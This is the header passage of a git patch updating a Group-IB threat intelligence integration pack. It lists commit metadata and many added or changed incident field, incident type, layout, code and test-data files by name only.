From 9d7649412ae2e0fa8d60f2710ac17956c146fc38 Mon Sep 17 00:00:00 2001 From: Kiriill Date: Thu, 30 Jan 2025 14:16:20 +0500 Subject: [PATCH 1/9] Update Group-IB Threat Intelligence Pack (#37239) --- .../.pack-ignore | 36 +- .../.secrets-ignore | 5 +- ...oup-IB_Threat_Intelligence_classifier.json | 26 +- ...r-Group-IB_Threat_Intelligence_mapper.json | 2443 +- .../incidentfield-CPE_Table.json | 33 + .../incidentfield-GIB_Address.json | 9 +- .../incidentfield-GIB_Admiralty_Code.json | 48 +- ...dentfield-GIB_Affected_Software_Table.json | 80 + .../incidentfield-GIB_Bulletin_Family.json | 34 + .../IncidentFields/incidentfield-GIB_CNC.json | 37 + .../incidentfield-GIB_CNC_Domain.json | 37 + .../incidentfield-GIB_CNC_Port.json | 37 + .../incidentfield-GIB_CNC_URL.json | 38 + .../incidentfield-GIB_CPE_Table.json | 119 + .../incidentfield-GIB_CVSS_Score.json | 34 + .../incidentfield-GIB_CVSS_Vector.json | 34 + .../IncidentFields/incidentfield-GIB_CVV.json | 7 +- .../incidentfield-GIB_Card_Issuer.json | 11 +- .../incidentfield-GIB_Card_Number.json | 11 +- .../incidentfield-GIB_Card_Type.json | 11 +- .../incidentfield-GIB_Card_Valid_Thru.json | 7 +- ...incidentfield-GIB_Compromised_Account.json | 36 + ..._Compromised_Events_Information_Table.json | 231 + ...entfield-GIB_Compromised_Events_Table.json | 171 + .../incidentfield-GIB_Compromised_Login.json | 11 +- .../incidentfield-GIB_Country_Code.json | 34 + .../incidentfield-GIB_Country_Name.json | 34 + .../incidentfield-GIB_Credibility.json | 48 +- ...entfield-GIB_Cybercriminal_Expertises.json | 36 + ...tfield-GIB_Cybercriminal_Forums_Table.json | 67 + ...cidentfield-GIB_Cybercriminal_Malware.json | 34 + ...cidentfield-GIB_Cybercriminal_Regions.json | 36 + ...cidentfield-GIB_Cybercriminal_Sectors.json | 36 + ...IB_Cybercriminal_Threat_Actor_Aliases.json | 34 + ...ybercriminal_Threat_Actor_Description.json | 34 + ...rcriminal_Threat_Actor_Report_Authors.json | 34 + ...ercriminal_Threat_Actor_Reports_Table.json | 80 + ...-GIB_Cybercriminal_Threat_Description.json | 34 + ...tfield-GIB_Cybercriminal_Threat_Title.json | 34 + .../incidentfield-GIB_DDOS_Date_Begin.json | 34 + .../incidentfield-GIB_DDOS_Date_End.json | 34 + ...identfield-GIB_DDOS_Date_Registration.json | 34 + .../incidentfield-GIB_DDOS_Duration.json | 34 + .../incidentfield-GIB_DDOS_Protocol.json | 34 + .../incidentfield-GIB_DDOS_Request_Body.json | 34 + ...identfield-GIB_DDOS_Request_Body_Hash.json | 34 + ...identfield-GIB_DDOS_Request_Data_Link.json | 34 + ...ntfield-GIB_DDOS_Request_Headers_Body.json | 34 + ...ntfield-GIB_DDOS_Request_Headers_Hash.json | 34 + .../incidentfield-GIB_DDOS_Source.json | 34 + .../incidentfield-GIB_DDOS_Target_ASN.json | 34 + ...ncidentfield-GIB_DDOS_Target_Category.json | 34 + .../incidentfield-GIB_DDOS_Target_City.json | 34 + ...entfield-GIB_DDOS_Target_Country_Code.json | 34 + ...entfield-GIB_DDOS_Target_Country_Name.json | 34 + .../incidentfield-GIB_DDOS_Target_Domain.json | 37 + .../incidentfield-GIB_DDOS_Target_IP.json | 34 + .../incidentfield-GIB_DDOS_Target_Port.json | 34 + ...ncidentfield-GIB_DDOS_Target_Provider.json | 34 + .../incidentfield-GIB_DDOS_Target_Region.json | 34 + .../incidentfield-GIB_DDOS_Target_URL.json | 37 + .../incidentfield-GIB_DDOS_Type.json | 34 + .../incidentfield-GIB_Data_Hash.json | 15 +- .../incidentfield-GIB_Date_Add.json | 34 + .../incidentfield-GIB_Date_Compromised.json | 8 +- .../incidentfield-GIB_Date_Created.json | 13 +- .../incidentfield-GIB_Date_Created_At.json | 40 + .../incidentfield-GIB_Date_Expired.json | 7 +- ...identfield-GIB_Date_First_Compromised.json | 36 + .../incidentfield-GIB_Date_First_Seen.json | 62 + .../incidentfield-GIB_Date_Incident.json | 34 + ...cidentfield-GIB_Date_Last_Compromised.json | 36 + .../incidentfield-GIB_Date_Last_Seen.json | 62 + .../incidentfield-GIB_Date_Modified.json | 34 + .../incidentfield-GIB_Date_Published.json | 36 + .../incidentfield-GIB_Date_Updated_At.json | 40 + .../incidentfield-GIB_Date_of_Detection.json | 24 +- .../incidentfield-GIB_Deface_Contacts.json | 34 + .../incidentfield-GIB_Deface_Date.json | 34 + .../incidentfield-GIB_Deface_Site_URL.json | 34 + .../incidentfield-GIB_Deface_Source.json | 34 + .../incidentfield-GIB_Downloaded_From.json | 13 +- ...cidentfield-GIB_Downloaded_From_Table.json | 106 + .../incidentfield-GIB_Drop_Email.json | 7 +- .../incidentfield-GIB_Drop_Email_Domain.json | 7 +- .../incidentfield-GIB_Email.json | 10 +- .../incidentfield-GIB_Email_Domains.json | 33 + .../incidentfield-GIB_Emails.json | 33 + .../incidentfield-GIB_Extended_CVSS_Base.json | 34 + ...ield-GIB_Extended_CVSS_Exploitability.json | 34 + ...ncidentfield-GIB_Extended_CVSS_Impact.json | 34 + ...cidentfield-GIB_Extended_CVSS_Overall.json | 34 + ...identfield-GIB_Extended_CVSS_Temporal.json | 34 + ...ncidentfield-GIB_Extended_Description.json | 34 + .../incidentfield-GIB_Favicon.json | 7 +- .../incidentfield-GIB_GIT_Source.json | 36 + .../incidentfield-GIB_HTML.json | 7 +- .../incidentfield-GIB_Has_Exploit.json | 34 + .../incidentfield-GIB_Href.json | 34 + .../IncidentFields/incidentfield-GIB_ID.json | 55 +- .../incidentfield-GIB_Inject_Dump.json | 7 +- .../incidentfield-GIB_Inject_MD5.json | 6 +- .../incidentfield-GIB_Is_Tailored.json | 36 + .../incidentfield-GIB_Leak_Name.json | 7 +- .../incidentfield-GIB_Leak_Published.json | 33 + .../incidentfield-GIB_Leaked_Data.json | 7 +- .../incidentfield-GIB_Leaked_File_Name.json | 6 +- .../incidentfield-GIB_Link_List_Table.json | 132 + .../incidentfield-GIB_Malware_Aliases.json | 34 + .../incidentfield-GIB_Malware_CNC_Domain.json | 34 + .../incidentfield-GIB_Malware_Categories.json | 34 + ...incidentfield-GIB_Malware_Description.json | 34 + .../incidentfield-GIB_Malware_File_hash.json | 34 + .../incidentfield-GIB_Malware_Langs.json | 34 + .../incidentfield-GIB_Malware_Name.json | 15 +- .../incidentfield-GIB_Malware_Platforms.json | 34 + .../incidentfield-GIB_Malware_Regions.json | 34 + ...ntfield-GIB_Malware_Short_Description.json | 34 + ...entfield-GIB_Malware_Source_Countries.json | 34 + .../incidentfield-GIB_Malware_Table.json | 67 + .../incidentfield-GIB_Matches_Table.json | 81 + .../incidentfield-GIB_Merged_Cvss.json | 34 + .../incidentfield-GIB_Mirror_Link.json | 34 + .../incidentfield-GIB_Name_Servers.json | 7 +- ...tion-State_Cybercriminal_Forums_Table.json | 67 + ...ation-State_Cybercriminals_Expertises.json | 34 + ...B_Nation-State_Cybercriminals_Malware.json | 34 + ...B_Nation-State_Cybercriminals_Regions.json | 34 + ...B_Nation-State_Cybercriminals_Sectors.json | 34 + ...e_Cybercriminals_Threat_Actor_Aliases.json | 35 + ...State_Cybercriminals_Threat_Actor_CVE.json | 34 + ...e_Cybercriminals_Threat_Actor_Country.json | 34 + ...bercriminals_Threat_Actor_Description.json | 34 + ...ate_Cybercriminals_Threat_Actor_Goals.json | 34 + ...te_Cybercriminals_Threat_Actor_Labels.json | 36 + ...rcriminals_Threat_Actor_Reports_Table.json | 80 + ...ate_Cybercriminals_Threat_Actor_Roles.json | 34 + ...State_Cybercriminals_Threat_Countries.json | 34 + ...ate_Cybercriminals_Threat_Description.json | 34 + ...tate_Cybercriminals_Threat_Expertises.json | 34 + ...ion-State_Cybercriminals_Threat_Langs.json | 34 + ...n-State_Cybercriminals_Threat_Regions.json | 34 + ...e_Cybercriminals_Threat_Report_Number.json | 34 + ...n-State_Cybercriminals_Threat_Sectors.json | 34 + ...ion-State_Cybercriminals_Threat_Title.json | 34 + ...ld-GIB_OSI_Git_Repository_Files_Table.json | 158 + .../incidentfield-GIB_Organization_BIC.json | 34 + .../incidentfield-GIB_Organization_BSB.json | 34 + .../incidentfield-GIB_Organization_CLABE.json | 34 + .../incidentfield-GIB_Organization_IBAN.json | 34 + .../incidentfield-GIB_Organization_Name.json | 34 + .../incidentfield-GIB_Organization_SWIFT.json | 34 + ...incidentfield-GIB_Parsed_Login_Domain.json | 34 + .../incidentfield-GIB_Parsed_Login_IP.json | 34 + .../incidentfield-GIB_Password.json | 12 +- .../incidentfield-GIB_Passwords.json | 33 + .../incidentfield-GIB_Payment_System.json | 11 +- .../incidentfield-GIB_Person.json | 9 +- .../incidentfield-GIB_Phishing_Brand.json | 37 + ...incidentfield-GIB_Phishing_Date_Added.json | 34 + ...cidentfield-GIB_Phishing_Date_Blocked.json | 11 +- ...identfield-GIB_Phishing_Date_Detected.json | 34 + ...cidentfield-GIB_Phishing_Date_Updated.json | 35 + .../incidentfield-GIB_Phishing_Domain.json | 13 +- ...d-GIB_Phishing_Domain_Expiration_Date.json | 37 + ...ncidentfield-GIB_Phishing_Domain_Puny.json | 37 + .../incidentfield-GIB_Phishing_IP_Table.json | 94 + .../incidentfield-GIB_Phishing_Kit_Email.json | 33 + ...incidentfield-GIB_Phishing_Kit_Emails.json | 7 +- .../incidentfield-GIB_Phishing_Kit_Hash.json | 7 +- .../incidentfield-GIB_Phishing_Kit_Path.json | 34 + ...incidentfield-GIB_Phishing_Kit_Source.json | 36 + .../incidentfield-GIB_Phishing_Kit_Table.json | 70 + ...incidentfield-GIB_Phishing_Objectives.json | 37 + .../incidentfield-GIB_Phishing_Registrar.json | 34 + .../incidentfield-GIB_Phishing_Sources.json | 36 + .../incidentfield-GIB_Phishing_Status.json | 8 +- .../incidentfield-GIB_Phishing_Type.json | 7 +- .../incidentfield-GIB_Phishing_URLs.json | 37 + .../incidentfield-GIB_Portal_Link.json | 53 +- .../incidentfield-GIB_Provider_Domain.json | 34 + .../incidentfield-GIB_Proxy_Port.json | 34 + .../incidentfield-GIB_Proxy_Source.json | 34 + .../incidentfield-GIB_Proxy_Sources.json | 34 + .../incidentfield-GIB_Proxy_Type.json | 34 + ...dentfield-GIB_Related_Indicators_Data.json | 62 +- .../incidentfield-GIB_Reliability.json | 48 +- .../incidentfield-GIB_Report_Number.json | 34 + .../incidentfield-GIB_Reporter.json | 34 + .../incidentfield-GIB_Repository.json | 7 +- .../incidentfield-GIB_Scanner_Categories.json | 34 + .../incidentfield-GIB_Scanner_Sources.json | 35 + .../incidentfield-GIB_Screenshot.json | 7 +- .../incidentfield-GIB_Service_Domain.json | 34 + .../incidentfield-GIB_Service_IP.json | 34 + .../incidentfield-GIB_Service_URL.json | 37 + .../incidentfield-GIB_Severity.json | 46 +- .../incidentfield-GIB_Socks_Proxy_Source.json | 33 + .../incidentfield-GIB_Source.json | 54 +- .../incidentfield-GIB_Target_ASN.json | 34 + .../incidentfield-GIB_Target_Brand.json | 8 +- .../incidentfield-GIB_Target_Category.json | 7 +- .../incidentfield-GIB_Target_City.json | 34 + .../incidentfield-GIB_Target_Domain.json | 11 +- ...identfield-GIB_Target_Domain_Provider.json | 34 + .../incidentfield-GIB_Target_IP.json | 34 + .../incidentfield-GIB_Target_Provider.json | 34 + .../incidentfield-GIB_Target_Region.json | 34 + ...ncidentfield-GIB_Threat_Actor_Country.json | 36 + .../incidentfield-GIB_Threat_Actor_ID.json | 21 +- .../incidentfield-GIB_Threat_Actor_Name.json | 25 +- ...incidentfield-GIB_Threat_Actor_is_APT.json | 25 +- ...incidentfield-GIB_Threat_Actors_Table.json | 65 + .../incidentfield-GIB_Threat_Level.json | 34 + .../incidentfield-GIB_Title.json | 8 +- .../incidentfield-GIB_Update_Time.json | 33 + .../incidentfield-GIB_Upload_Time.json | 33 + .../incidentfield-GIB_VPN_Names.json | 34 + .../incidentfield-GIB_VPN_Sources.json | 34 + .../incidentfield-GIB_Victim_IP.json | 7 +- .../incidentfield-GIB_Vulnerability_Type.json | 34 + .../incidenttype-GIB_APT_Threat.json | 34 + .../incidenttype-GIB_Attacks_DDOS.json | 34 + .../incidenttype-GIB_Attacks_Deface.json | 34 + ...cidenttype-GIB_Attacks_Phishing_Group.json | 34 + ...incidenttype-GIB_Attacks_Phishing_Kit.json | 34 + ...enttype-GIB_Brand_Protection_Phishing.json | 4 +- ...ype-GIB_Brand_Protection_Phishing_Kit.json | 6 +- .../incidenttype-GIB_Compromised_Account.json | 6 +- ...enttype-GIB_Compromised_Account_Group.json | 34 + .../incidenttype-GIB_Compromised_Card.json | 6 +- ...cidenttype-GIB_Compromised_Card_Group.json | 34 + .../incidenttype-GIB_Compromised_Mule.json | 34 + ...incidenttype-GIB_Cybercriminal_Threat.json | 34 + ...nttype-GIB_Cybercriminal_Threat_Actor.json | 34 + .../incidenttype-GIB_Data_Breach.json | 14 +- .../incidenttype-GIB_Malware.json | 34 + .../incidenttype-GIB_Malware_CNC.json | 36 + ...IB_Nation-State_Cybercriminals_Threat.json | 34 + ...ion-State_Cybercriminals_Threat_Actor.json | 34 + .../incidenttype-GIB_OSI_Git_Leak.json | 16 +- .../incidenttype-GIB_OSI_Public_Leak.json | 16 +- .../incidenttype-GIB_OSI_Vulnerability.json | 34 + ...denttype-GIB_Suspicious_IP_Open_Proxy.json | 34 + ...ncidenttype-GIB_Suspicious_IP_Scanner.json | 34 + ...enttype-GIB_Suspicious_IP_Socks_Proxy.json | 34 + ...cidenttype-GIB_Suspicious_IP_TOR_Node.json | 34 + .../incidenttype-GIB_Suspicious_IP_VPN.json | 34 + .../incidenttype-GIB_Targeted_Malware.json | 6 +- .../indicatorfield-GIB_Admiralty_Code.json | 3 +- .../indicatorfield-GIB_Collection.json | 1 - .../indicatorfield-GIB_Credibility.json | 3 +- .../indicatorfield-GIB_Hash.json | 30 + .../indicatorfield-GIB_ID.json | 3 +- .../indicatorfield-GIB_Malware_Name.json | 1 - .../indicatorfield-GIB_Proxy_Anonymous.json | 2 +- .../indicatorfield-GIB_Reliability.json | 3 +- .../indicatorfield-GIB_Severity.json | 3 +- .../indicatorfield-GIB_Threat_Actor_ID.json | 1 - .../indicatorfield-GIB_Threat_Actor_Name.json | 1 - ...ndicatorfield-GIB_Threat_Actor_is_APT.json | 1 - .../reputation-GIB_Compromised_IMEI.json | 2 +- .../reputation-GIB_Compromised_Mule.json | 2 +- .../reputation-GIB_Victim_IP.json | 2 +- .../Integrations/GroupIBTIA/GroupIBTIA.py | 3279 ++- .../Integrations/GroupIBTIA/GroupIBTIA.yml | 665 +- .../GroupIBTIA/GroupIBTIA_test.py | 516 +- .../Integrations/GroupIBTIA/README.md | 27 +- .../GroupIBTIA/command_examples.txt | 22 +- .../avalible_collections_example.json | 37 + .../GroupIBTIA/test_data/example.json | 684 - .../test_data/main_collections_examples.json | 11155 +++++++++ .../GroupIBTIA/test_data/results.json | 91 - .../GroupIBTIA/test_data/search_example.json | 42 + .../GroupIB_TIA_Feed/GroupIB_TIA_Feed.py | 2107 +- .../GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml | 19 +- .../GroupIB_TIA_Feed/GroupIB_TIA_Feed_test.py | 157 +- .../GroupIB_TIA_Feed/command_examples.txt | 2 +- .../avalible_collections_example.json | 38 + .../GroupIB_TIA_Feed/test_data/example.json | 713 - .../test_data/main_collections_examples.json | 19588 ++++++++++++++++ .../GroupIB_TIA_Feed/test_data/results.json | 587 - ...ayoutscontainer-GIB_APT_Threat_Layout.json | 392 + ...outscontainer-GIB_Attacks_DDOS_Layout.json | 758 + ...tscontainer-GIB_Attacks_Deface_Layout.json | 618 + ...ner-GIB_Attacks_Phishing_Group_Layout.json | 598 + ...ainer-GIB_Attacks_Phishing_Kit_Layout.json | 493 + ..._Brand_Protection_Phishing_Kit_Layout.json | 6 +- ...-GIB_Brand_Protection_Phishing_Layout.json | 6 +- ...-GIB_Compromised_Account_Group_Layout.json | 1647 ++ ...tainer-GIB_Compromised_Account_Layout.json | 7 +- ...ner-GIB_Compromised_Card_Group_Layout.json | 582 + ...container-GIB_Compromised_Card_Layout.json | 7 +- ...container-GIB_Compromised_IMEI_Layout.json | 2 +- ...container-GIB_Compromised_Mule_Layout.json | 465 +- ...GIB_Cybercriminal_Threat_Actor_Layout.json | 529 + ...ainer-GIB_Cybercriminal_Threat_Layout.json | 591 + ...youtscontainer-GIB_Data_Breach_Layout.json | 153 +- ...youtscontainer-GIB_Malware_CNC_Layout.json | 442 + .../layoutscontainer-GIB_Malware_Layout.json | 496 + ...te_Cybercriminals_Threat_Actor_Layout.json | 561 + ...on-State_Cybercriminals_Threat_Layout.json | 643 + ...outscontainer-GIB_OSI_Git_Leak_Layout.json | 160 +- ...scontainer-GIB_OSI_Public_Leak_Layout.json | 163 +- ...ontainer-GIB_OSI_Vulnerability_Layout.json | 652 + ...r-GIB_Suspicious_IP_Open_Proxy_Layout.json | 489 + ...iner-GIB_Suspicious_IP_Scanner_Layout.json | 451 + ...-GIB_Suspicious_IP_Socks_Proxy_Layout.json | 460 + ...ner-GIB_Suspicious_IP_TOR_Node_Layout.json | 442 + ...ontainer-GIB_Suspicious_IP_VPN_Layout.json | 460 + ...container-GIB_Targeted_Malware_Layout.json | 6 +- ...layoutscontainer-GIB_Victim_IP_Layout.json | 2 +- ...IB_Threat_Intelligence_and_Attribution.yml | 9 +- ...eat_Intelligence_and_Attribution_README.md | 8 + ...-e506-4bcb-8ee5-fe5fb30e72d8-gib_rule.json | 89 + .../README.md | 1 + .../ReleaseNotes/2_0_0.md | 620 + .../GIBIncidentUpdate/GIBIncidentUpdate.yml | 2 +- .../Scripts/GIBIncidentUpdate/README.md | 6 +- .../GIBIncidentUpdateIncludingClosed.yml | 2 +- .../README.md | 6 +- ...Threat_Intelligence_&_Attribution-Test.yml | 50 +- .../pack_metadata.json | 2 +- 323 files changed, 57539 insertions(+), 6314 deletions(-) create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-CPE_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Affected_Software_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Bulletin_Family.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_Domain.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_Port.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_URL.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CPE_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVSS_Score.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVSS_Vector.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Account.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Events_Information_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Events_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Country_Code.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Country_Name.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Expertises.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Forums_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Malware.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Regions.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Sectors.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Aliases.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Description.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Report_Authors.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Reports_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Description.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Title.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_Begin.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_End.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_Registration.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Duration.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Protocol.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Body.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Body_Hash.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Data_Link.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Headers_Body.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Headers_Hash.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Source.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_ASN.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Category.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_City.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Country_Code.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Country_Name.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Domain.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_IP.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Port.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Provider.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Region.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_URL.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Type.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Add.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Created_At.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_First_Compromised.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_First_Seen.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Incident.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Last_Compromised.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Last_Seen.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Modified.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Published.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Updated_At.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Contacts.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Date.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Site_URL.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Source.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Downloaded_From_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Email_Domains.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Emails.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Base.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Exploitability.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Impact.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Overall.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Temporal.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_Description.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_GIT_Source.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Has_Exploit.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Href.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Is_Tailored.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leak_Published.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Link_List_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Aliases.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_CNC_Domain.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Categories.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Description.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_File_hash.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Langs.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Platforms.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Regions.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Short_Description.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Source_Countries.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Matches_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Merged_Cvss.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Mirror_Link.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminal_Forums_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Expertises.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Malware.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Regions.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Sectors.json create mode 100644 